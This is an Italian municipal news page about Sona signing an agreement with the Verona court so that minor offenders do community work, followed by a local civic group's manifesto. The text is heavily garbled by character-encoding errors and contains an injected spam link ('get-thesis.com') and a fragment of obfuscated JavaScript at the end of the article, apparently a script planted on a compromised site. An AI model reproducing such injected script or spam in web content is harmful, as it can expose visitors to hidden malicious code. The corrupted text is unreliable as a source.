Sona: firmata la convenzione con il Tribunale di Verona per lo svolgimento di lavori di pubblica utilitAi?? in sostituzione del carcere per reati lievi.

12 Agosto 2014 – Sona (Verona)

Il 9 luglio A? stata sottoscritta dal Sindaco Gianluigi Mazzi la convenzione presso il Tribunale di Verona per lo ai???svolgimento di lavoro di pubblica utilitAi?? ai sensi dellai??i??art. 54 del D.Lgs. n. 274/2000 e dellai??i??art. 2 del D. Ministero Giustizia del 26/03/2001ai???.

ai???In pratica ai??i?? dichiara il Sindaco Gianluigi Mazzi -, per alcune tipologie di pene considerate compatibili e di lieve entitAi??, si puA? lavorare per la comunitAi?? invece che stare in carcere e/o pagare una grossa sanzione pecuniaria. In ogni caso, il giudice puA? applicare la pena del lavoro di pubblica utilitAi?? solo su richiesta dellai??i??imputato. Tra le attivitAi?? non retribuite a favore della collettivitAi?? rientrano le prestazioni di lavoro per manutenzione e decoro di beni del patrimonio pubblico ivi compresi giardini e parchi, le prestazioni a favore di portatori di handicap, malati, anziani, minori, extracomunitari, le prestazioni nel campo della sicurezza e dellai??i??educazione stradale. Direi che sono lavori di cui a Sona si sente realmente il bisogno, non cai??i??A? dubbio.ai???

La proposta era stata approvata nel Consiglio Comunale nellai??i??ottobre del 2011, presentata dallai??i??allora consigliere di minoranza Gianmichele Bianco a nome di gran parte della minoranza. get-thesis.com/. La ratio della proposta era che la pena detentiva e pecuniaria potesse essere sostituita con quella di lavoro di pubblica utilitAi??, da svolgere, in via prioritaria nel campo della sicurezza e dellai??i??educazione stradale, con le modalitAi?? di cui allai??i??art. 54 del D. Lgs. 274/2000.

La Giunta di Sona ha individuato nellai??i??ambito della Polizia locale, dei Servizio Interventi sociali e dei Lavori Pubblici i settori nei quali adibire i lavoratori di pubblica utilitAi?? indirizzati con provvedimento del Tribunale di Verona e ha individuato nei relativi responsabili i referenti per il coordinamento della prestazione lavorativa del condannato, per impartire le relative istruzioni, nonchAi?? per redigere, terminata lai??i??esecuzione della pena, la relazione conclusiva che documenti lai??i??assolvimento degli obblighi inerenti al lavoro svolto.

ai???I lavoratori di pubblica utilitAi?? saranno due per la manutenzione e decoro dei beni pubblici, due per la vigilanza attraversamento e due per servizio sociali a minori, anziani, malati e portatori di handicap per un totale di 6 persone ai??i?? continua il Sindaco -. Con lai??i??apposizione della firma si chiude il cerchio della bella proposta che avevamo presentato nel 2011. Lai??i??Amministrazione sta investendo molto su alcuni temi per noi vitali: servizi sociali per chi ne ha bisogno, sicurezza per le fasce da proteggere e decoro dei nostri paesi. Queste sono le nostre parole dai??i??ordine.ai???

ai???Si parte giAi?? lunedAi?? 18 agosto dove sono previste le prime attivitAi?? che vedranno per molte aree pubbliche diversi interventi per la manutenzione e il decoro dei beni del patrimonio comunaleai???. 46d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.